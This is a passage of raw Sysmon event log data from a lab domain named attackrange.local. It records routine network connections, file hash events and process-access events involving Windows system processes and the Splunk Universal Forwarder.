Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0970DC1160FC2D4FA5AFEB381112BDF6,SHA256=688565629E5A50B3C2BEEF988C24C6832F77871861386C2E96B5A150B7DF5581,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106146Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.710{58E9C193-ACA7-615A-0D00-00000000FC01}896C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51829-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000106145Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.710{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51829-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000106144Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.427{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51828-false10.0.1.12-8000- 23542300x800000000000000082930Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:02.961{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AB8A3CBE0D9B4B2544797EB7FE4CB0C,SHA256=8B724D94CF34BC675F4BF950C4C75756D124B818069909E89B31373D2A6DBA2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106167Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.873{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6D54F94F24FF6108AFB8ECAA524DBC4,SHA256=A5E71D74728C9904F52C1102E7CFD97B99DEC7B75AB3418CCFE819531E661D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106166Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.673{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106165Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.604{58E9C193-B446-615A-1202-00000000FC01}52525704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106164Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.376{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B446-615A-1202-00000000FC01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106163Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.373{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106162Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.373{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106161Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.373{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106160Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.373{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106159Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.373{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B446-615A-1202-00000000FC01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106158Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.372{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B446-615A-1202-00000000FC01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106157Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:02.219{58E9C193-B446-615A-1202-00000000FC01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000106156Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.828{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51833-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000106155Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.828{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51833-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000106154Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.723{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-639.attackrange.local51832-false10.0.1.14win-dc-639.attackrange.local389ldap 354300x8000000000000000106153Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.723{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51832-false10.0.1.14win-dc-639.attackrange.local389ldap 354300x8000000000000000106152Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.713{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51831-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000106151Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.712{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51831-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000106150Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.711{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51830-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49666- 354300x8000000000000000106149Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.711{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51830-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49666- 23542300x8000000000000000106178Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.878{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=472D8A7422839580C85E79CF1BFC1D00,SHA256=68C93EBFACD3E562D6FAE4235B1735480122D0AA4FC0BA873EC0D4B2FA6C718D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082931Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:03.977{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7E6255ECC0580F4B4060027FDC5A75,SHA256=1E78E31A494696A477AFA0B0FAD406D0E63F7F86674B35A576A5D4125BA1024D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106177Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.482{58E9C193-B447-615A-1302-00000000FC01}4180848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106176Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.236{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AB6D25FEDABEE8D529A30689D30E77F,SHA256=CE9F9B28DC2A95C3C440A28C03B211E6E2BF3510903401EDBE58FFD51FA73FDD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106175Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.215{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B447-615A-1302-00000000FC01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106174Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.213{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106173Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.213{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106172Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.213{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106171Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.213{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106170Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.212{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B447-615A-1302-00000000FC01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106169Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.212{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B447-615A-1302-00000000FC01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106168Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:03.212{58E9C193-B447-615A-1302-00000000FC01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106188Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.890{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=086C9921E702D84DB70E4B6D43576906,SHA256=66F765B2E1C54DC73EFEB5829AD8DC72A61321D60DA31F2A4EEC841757402AFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106187Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.566{58E9C193-B447-615A-1402-00000000FC01}61804244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106186Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.276{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B447-615A-1402-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106185Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:04.269{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B447-615A-1402-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106184Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 